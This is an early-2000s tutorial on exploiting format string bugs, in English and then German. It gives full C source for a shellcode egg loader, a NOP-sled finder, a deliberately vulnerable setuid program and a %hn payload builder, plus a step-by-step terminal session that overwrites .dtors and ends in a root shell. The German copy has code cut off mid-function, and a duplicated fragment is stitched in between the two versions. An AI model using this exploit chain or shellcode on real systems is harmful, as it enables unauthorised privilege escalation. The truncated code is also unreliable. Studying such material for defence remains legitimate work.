How to write Format String Exploits

How to write Format String Exploits,
also a summary of the texts in child-fair pieces of http://community.core-sdi.com/~juliano/
by Delikon (ich@delikon.de/www.Delikon.de.vu/27.4.02)

Everyone of the following codes ist not from me, i have rewrite them a little bit, to get them work with every local Format String Bug.

Now i will show you every code, you can also download the sourcecode from www.delikon.de.vu
in the security section.

1.The Eggshell. This code is used to copy the shellcode into the memory. It is from
"Format String Attack on alpha system", and a little bit rewritten.

-----------------egg.c--------------------------

/*
* this shall set egg shell in our environment
* ./egg <size> <align>
* truefinder, seo@igrus.inha.ac.kr
*
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define DEF_EGGSIZE 4096
#define DEF_ALIGN 5

char nop[] = { 0x90 };

static char shellcode[] =
"\x6a\x17\x58\x31\xdb\xcd\x80\x31"
"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x8d\x42\x0b\xcd\x80";

int
main( int argc, char *argv[] )
{

char *eggbuf, *buf_ptr;
int align, i, eggsize ;

align = DEF_ALIGN;
eggsize = DEF_EGGSIZE ;

if ( argc < 2 ) {
printf ("%s <align> <size>\n", argv[0] );
exit(0);
}

if ( argc > 1 )
align = DEF_ALIGN + atoi(argv[1]);

if ( argc > 2 )
eggsize = atoi(argv[2]) + DEF_ALIGN ;

if ( (eggbuf = malloc( eggsize )) == NULL ) {
printf ("error : malloc \n");
exit (-1);
}

/* set egg buf */
memset( eggbuf, (int)NULL , eggsize );

for ( i = 0; i < 250 ; i++ )
strcat ( eggbuf, nop );

strcat ( eggbuf, shellcode );

for ( i =0 ; i < align ; i++ )
strcat ( eggbuf, "A");

memcpy ( eggbuf, "S=", 2 );
putenv ( eggbuf );

system("/bin/sh");

}

--------------------------end here----------------------------------------

2. With "find.c" you can find the location with the shellcode in the stack(from GOOBLES
screen-exploit).
you can also find the address with,

a) gdb ./vuln
b) set args %s%s%s%s%s%s%s%s%s%s
c) run
d) gdb say vuln exit with an error
e) x/2000 $ebp
f) serch the memory location with the nops(0x90).

-------------------------find.c-----------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*Thanks to GOBBLES for the code*/

unsigned long get_sp(void)
{ __asm__ ("movl %esp, %eax");
}

int i=0;
char *pointer;
char *nops = "\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90";
main(){
fprintf(stderr, ". SUCHE!\n");
pointer = (char *)get_sp();
while((i = strncmp(pointer, nops, strlen(nops))) != 0)
pointer++;

if(i == 0) {
fprintf(stderr, "Shellcode ist bei ----> : 0x%lx\n", pointer+1);
return;
}
else {
fprintf(stderr, "Sorry nimm GDB\n");
return;
}
}

--------------------------end here------------------------------------------

3. This is the program with the Bug, i have it from "What are format bugs ?"
by Christophe BLAESS Christophe GRENIERFrédéreric RAYNAL, in my opinion the best tutorial.

--------------------------vuln.c------------------------------------------

/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int helloWorld();
int accessForbidden();

int vuln(const char *format)
{
char buffer[128];
int (*ptrf)();

memset(buffer, 0, sizeof(buffer));

printf("helloWorld() = %p\n", helloWorld);
printf("accessForbidden() = %p\n\n", accessForbidden);

ptrf = helloWorld;
printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

snprintf(buffer, sizeof buffer, format);
printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

return ptrf();
}

int main(int argc, char **argv) {
int i;
if (argc <= 1) {
fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
exit(-1);
}
for(i=0;i<argc;i++)
printf("%d %p\n",i,argv[i]);

exit(vuln(argv[1]));
}

int helloWorld()
{
printf("Welcome in \"helloWorld\"\n");
fflush(stdout);
return 0;
}

int accessForbidden()
{
printf("You shouldn't be here \"accesForbidden\"\n");
fflush(stdout);
return 0;
}

------------------------------end here-------------------------------

4. the last one is the Formatstringbuilder "builder.c", from "What are format bugs ?",too.
you can do this also manual.

-----------------------------builder.c------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/**
The 4 bytes where we have to write are placed that way : HH HH LL LL

The variables ending with "*h" refer to the high part of the word (H)
The variables ending with "*l" refer to the low part of the word (L)
*/
char* build(unsigned int addr, unsigned int value, unsigned int where) {

unsigned int length = 128; //too lazy to evaluate the true length ...
unsigned int valh;
unsigned int vall;
unsigned char b0 = (addr >> 24) & 0xff;
unsigned char b1 = (addr >> 16) & 0xff;
unsigned char b2 = (addr >> 8) & 0xff;
unsigned char b3 = (addr ) & 0xff;

char *buf;

/* detailing the value */
valh = (value >> 16) & 0xffff; //top
vall = value & 0xffff; //bottom

fprintf(stderr, "adr : %d (%x)\n", addr, addr);
fprintf(stderr, "val : %d (%x)\n", value, value);
fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);

/* buffer allocation */
if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
fprintf(stderr, "Can't allocate buffer (%d)\n", length);
exit(EXIT_FAILURE);
}
memset(buf, 0, length);

/* let's build */
if (valh < vall) {

snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */

"%%.%hdx" /* set the value for the first %hn */
"%%%d$hn" /* the %hn for the high part */

"%%.%hdx" /* set the value for the second %hn */
"%%%d$hn" /* the %hn for the low part */
,
b3+2, b2, b1, b0, /* high address */
b3, b2, b1, b0, /* low address */

valh-8, /* set the value for the first %hn */
where, /* the %hn for the high part */

vall-valh, /* set the value for the second %hn */
where+1 /* the %hn for the low part */
);

} else {

snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */

"%%.%hdx" /* set the value for the first %hn */
"%%%d$hn" /* the %hn for the high part */

"%%.%hdx" /* set the value for the second %hn */
"%%%d$hn" /* the %hn for the low part */
,
b3+2, b2, b1, b0, /* high address */
b3, b2, b1, b0, /* low address */

vall-8, /* set the value for the first %hn */
where+1, /* the %hn for the high part */

valh-vall, /* set the value for the second %hn */
where /* the %hn for the low part */
);
}
return buf;
}

int
main(int argc, char **argv) {

char *buf;

if (argc < 3)
return EXIT_FAILURE;
buf = build(strtoul(argv[1], NULL, 16), /* adresse */
strtoul(argv[2], NULL, 16), /* valeur */
atoi(argv[3])); /* offset */

fprintf(stderr, "[%s] (%d)\n", buf, strlen(buf));
printf("%s", buf);
return EXIT_SUCCESS;
}

------------------------------------end here------------------------------------

Now we get started.
(compile it with gcc -o vuln vuln.c, and the following programms, too.)
set it setuid root with

chown root.root vuln
chmod 4775 vuln

exp@delikon:~/geht> ls -la
insgesamt 91
drwxr-xr-x 2 exp users 253 Apr 27 16:16 .
drwx------ 21 exp users 2240 Apr 27 16:32 ..
-rwxr-xr-x 1 exp users 15204 Apr 27 15:53 build
-rw-r--r-- 1 exp users 3804 Apr 26 19:25 build.c
-rw-r--r-- 1 exp users 36 Apr 26 19:26 chmod.txt
-rw-r--r-- 1 exp users 34 Apr 26 19:27 dtors.tct
-rwxr-xr-x 1 exp users 14756 Apr 27 15:42 egg
-rw-r--r-- 1 exp users 1377 Apr 26 19:25 egg.c
-rwxr-xr-x 1 exp users 14121 Apr 27 16:04 find
-rw-r--r-- 1 exp users 748 Apr 27
-rwsrwxr-x 1 root root 15028 Apr 27 15:54 vuln
-rw-r--r-- 1 exp users 1009 Apr 26 19:55 vuln.c

vuln is now setuid root.

2. start the eggshell (now the shell is in the stack).

exp@delikon:~/geht> ./egg 5 6000
sh-2.05$

you can use other viariables ,too. try it.

3. find the .dtors sektion from vuln (this is the memory location , which we want to overwrite)

sh-2.05$ objdump -s -j .dtors vuln

vuln: file format elf32-i386

Contents of section .dtors:
8049a64 ffffffff 00000000 ........
sh-2.05$

the location is 0x8049a64+4=0x8049a68 (you must add 4 everytime!, please read "Overwriting the .dtors section.")

4. the 3 and last argument is the offset, every box has a different offset.
i search it manual with,

sh-2.05$ ./vuln AAAA%6\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA4000b07e] (12)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

sh-2.05$ ./vuln AAAA%7\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA8048780] (11)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

sh-2.05$ ./vuln AAAA%8\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA41414141] (12) <--------- we find it!!! because A is 41 in hex.
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

you see the offset is 8
P.S maybe you must start at home with 1 not with 6 like me

5.now we need the location which we want write in 0x8049a68 ,
this is the shellcode location.

sh-2.05$ ./find
. SUCHE!
Shellcode ist bei ----> : 0xbffffbae

6. we are ready ! we have your 3 argument "the where(0x8049a68)" the "what(0xbffffbae)
and the "Offset(8)"

lets check the user vor the last time

sh-2.05$ whoami
exp

now we start the exploit

sh-2.05$ ./vuln `./build 0x8049a68 0xbffffbae 8`

adr : 134519400 (8049a68)
val : -1073742930 (bffffbae)
valh: 49151 (bfff)
vall: 64430 (fbae)
[jh%.49143x%8$hn%.15279x%9$hn] (34)
0 0xbffff676
1 0xbffff67d
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3bc)
buffer = [jh00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048780 (0xbffff3bc)
Welcome in "helloWorld"

sh-2.05# whoami
root <--------------- now we are root!!!!!!

P.S.every argument of this tutorial is different, at every pc! i you have questions mail me ich@delikon.de
or vist me www.delikon.de.vu

= 0x8048780 (0xbffff3bc)
buffer = [jh00000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000] (127)
after : ptrf() = 0x8048780 (0xbffff3bc)
Welcome in "helloWorld"

sh-2.05# whoami
root <--------------- Sieg des Menschen über die Maschine

P.S. bei euch sind alle Werte anders, es muss aber trozdem gehen wenn nicht, mailt mir ich@delikon.de
oder besucht mich unter www.delikon.de.vu

Wie schreibt man Format String Exploits

Wie schreibt man Format String Exploits,
oder auch eine Zusammenfassung der Texte von http://community.core-sdi.com/~juliano/ in kindgerechten Happen.
von Delikon (ich@delikon.de/www.delikon.de.vu/27.4.02)

Jeder der folgenden Codes stammt nicht von mir, ich habe sie nur ein wenig umgeschrieben damit sie bei diesem Beispiel
und jeden beliebigen local Format String Bug funktionieren.

Ich werde nun alle Quellcodes ein mal vorstellen.
Auch unter www.delikon.de.vu in der Securitysection zum downloaden.

1. Die Eggshell. Diese wird verwendet um den Shellcode in den Speicher zu kopieren.Dieser Code ist von
"Format String Attack on alpha system" nur eben auf ix86 portiert, und mit den Shellcode von dem ptrace24.c exploit.

-----------------egg.c--------------------------

/*
* this shall set egg shell in our environment
* ./egg <size> <align>
* truefinder, seo@igrus.inha.ac.kr
*
*/

#include <stdio.h>
#include <string.h>
#include <stdlib.h>

#define DEF_EGGSIZE 4096
#define DEF_ALIGN 5

char nop[] = { 0x90 };

static char shellcode[] =
"\x6a\x17\x58\x31\xdb\xcd\x80\x31"
"\xd2\x52\x68\x6e\x2f\x73\x68\x68"
"\x2f\x2f\x62\x69\x89\xe3\x52\x53"
"\x89\xe1\x8d\x42\x0b\xcd\x80";

int
main( int argc, char *argv[] )
{

char *eggbuf, *buf_ptr;
int align, i, eggsize ;

align = DEF_ALIGN;
eggsize = DEF_EGGSIZE ;

if ( argc < 2 ) {
printf ("%s <align> <size>\n", argv[0] );
exit(0);
}

if ( argc > 1 )
align = DEF_ALIGN + atoi(argv[1]);

if ( argc > 2 )
eggsize = atoi(argv[2]) + DEF_ALIGN ;

if ( (eggbuf = malloc( eggsize )) == NULL ) {
printf ("error : malloc \n");
exit (-1);
}

/* set egg buf */
memset( eggbuf, (int)NULL , eggsize );

for ( i = 0; i < 250 ; i++ )
strcat ( eggbuf, nop );

strcat ( eggbuf, shellcode );

for ( i =0 ; i < align ; i++ )
strcat ( eggbuf, "A");

memcpy ( eggbuf, "S=", 2 );
putenv ( eggbuf );

system("/bin/sh");

}

--------------------------end here----------------------------------------

2. "find.c" mit dem Code findest du die Speicheraddresse im Stack, von GOBBLES screen exploit.
Man findet die Addresse aber auch hier mit ,
a) gdb ./vuln
b) set args %s%s%s%s%s%s%s%s%s%s
c) run
d) gdb sagt das das Proggy abgestürzt ist
e) x/2000 $ebp
f) such eine von den Stellen mit den nops

-------------------------find.c-----------------------------------------

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
/*Thanks to GOBBLES for the code*/

unsigned long get_sp(void)
{ __asm__ ("movl %esp, %eax");
}

if(i == 0) {
fprintf(stderr, "Shellcode ist bei ----> : 0x%lx\n", pointer+1);
return;
}
else {
fprintf(stderr, "Sorry nimm GDB\n");
return;
}
}

--------------------------end here------------------------------------------

3. Das Programm mit dem Bug, habe ich von "What are format bugs ?"
von Christophe BLAESS Christophe GRENIERFrédéreric RAYNAL, meiner Meinung nach das beste Tutorial

--------------------------vuln.c------------------------------------------

/* vuln.c */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int helloWorld();
int accessForbidden();

int vuln(const char *format)
{
char buffer[128];
int (*ptrf)();

memset(buffer, 0, sizeof(buffer));

printf("helloWorld() = %p\n", helloWorld);
printf("accessForbidden() = %p\n\n", accessForbidden);

ptrf = helloWorld;
printf("before : ptrf() = %p (%p)\n", ptrf, &ptrf);

snprintf(buffer, sizeof buffer, format);
printf("buffer = [%s] (%d)\n", buffer, strlen(buffer));

printf("after : ptrf() = %p (%p)\n", ptrf, &ptrf);

return ptrf();
}

int main(int argc, char **argv) {
int i;
if (argc <= 1) {
fprintf(stderr, "Usage: %s <buffer>\n", argv[0]);
exit(-1);
}
for(i=0;i<argc;i++)
printf("%d %p\n",i,argv[i]);

exit(vuln(argv[1]));
}

int helloWorld()
{
printf("Welcome in \"helloWorld\"\n");
fflush(stdout);
return 0;
}

int accessForbidden()
{
printf("You shouldn't be here \"accesForbidden\"\n");
fflush(stdout);
return 0;
}

------------------------------end here-------------------------------

4. und als letztes der Formatstringbuilder "builder.c", auch von "What are format bugs ?"
geht aber auch alles per Hand :=), ist aber dann nicht meht kindgerecht ;).

-----------------------------builder.c------------------------------
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <string.h>

/**
The 4 bytes where we have to write are placed that way : HH HH LL LL

char *buf;

/* detailing the value */
valh = (value >> 16) & 0xffff; //top
vall = value & 0xffff; //bottom

fprintf(stderr, "adr : %d (%x)\n", addr, addr);
fprintf(stderr, "val : %d (%x)\n", value, value);
fprintf(stderr, "valh: %d (%.4x)\n", valh, valh);
fprintf(stderr, "vall: %d (%.4x)\n", vall, vall);

/* buffer allocation */
if ( ! (buf = (char *)malloc(length*sizeof(char))) ) {
fprintf(stderr, "Can't allocate buffer (%d)\n", length);
exit(EXIT_FAILURE);
}
memset(buf, 0, length);

/* let's build */
if (valh < vall) {

snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */

"%%.%hdx" /* set the value for the first %hn */
"%%%d$hn" /* the %hn for the high part */

"%%.%hdx" /* set the value for the second %hn */
"%%%d$hn" /* the %hn for the low part */
,
b3+2, b2, b1, b0, /* high address */
b3, b2, b1, b0, /* low address */

valh-8, /* set the value for the first %hn */
where, /* the %hn for the high part */

vall-valh, /* set the value for the second %hn */
where+1 /* the %hn for the low part */
);

} else {

snprintf(buf,
length,
"%c%c%c%c" /* high address */
"%c%c%c%c" /* low address */

int
main(int argc, char **argv) {

char *buf;

------------------------------------end here------------------------------------

So nun zur Anwendung.
(kompilieren mit gcc -o vuln vuln.c, alle anderen Programme bitte auch in diesem Format.)
den setuid root mit

chown root.root vuln
chmod 4775 vuln

vuln ist nun setuid root.

2. eggshell starten (damit die Shell im Speicher liegt).

exp@delikon:~/geht> ./egg 5 6000
sh-2.05$

es gehen auch andere Werte nicht nur 5 und 6000.

3. die .dtors Sektion von vuln finden (das ist der Speicherbereich der überschrieben wird)

sh-2.05$ objdump -s -j .dtors vuln

vuln: file format elf32-i386

Contents of section .dtors:
8049a64 ffffffff 00000000 ........
sh-2.05$

also ist der Wert 0x8049a64+4=0x8049a68 (man muss immer 4 addieren, lest nach unter "Overwriting the .dtors section.")

4. Als dritten Wert brauchen wir nun den Offset, das ist bei jedem Rechner verschieden.
Das mache ich ganz stupide manuel.

sh-2.05$ ./vuln AAAA%6\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA4000b07e] (12)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

sh-2.05$ ./vuln AAAA%7\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA8048780] (11)
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

sh-2.05$ ./vuln AAAA%8\$x

0 0xbffff690
1 0xbffff697
helloWorld() = 0x8048780
accessForbidden() = 0x80487c0

before : ptrf() = 0x8048780 (0xbffff3cc)
buffer = [AAAA41414141] (12) <--------- Jawohl so muss das aussehen, denn A ist in hex 41 !!!!
after : ptrf() = 0x8048780 (0xbffff3cc)
Welcome in "helloWorld"

der Offset ist also = 8
P.S bei euch kann er auch 1 sein aber ich habe hier mit 6 angefangen.

5. nun brauchen wir den Wert den wir in 0x8049a68 schreiben wollen das ist,
logischerweise die Stelle von unserem Shellcode

sh-2.05$ ./find
. SUCHE!
Shellcode ist bei ----> : 0xbffffbae

6. So ich habe fertig. Wir haben jetzt die 3 Werte die wir brauchen das "Wohin(0x8049a68)" das "Was(0xbffffbae)
und den "Offset(8)"

noch ein letztes man den user ckecken

sh-2.05$ whoami
exp

Wir starten nun das Exploit

sh-2.05$ ./vuln `./build 0x8049a68 0xbffffbae 8`

sh-2.05# whoami
root <--------------- Sieg des Menschen über die Maschine

P.S. bei euch sind alle Werte anders, es muss aber trozdem gehen wenn nicht, mailt mir ich@delikon.de
oder besucht mich unter www.delikon.de.vu

Credits: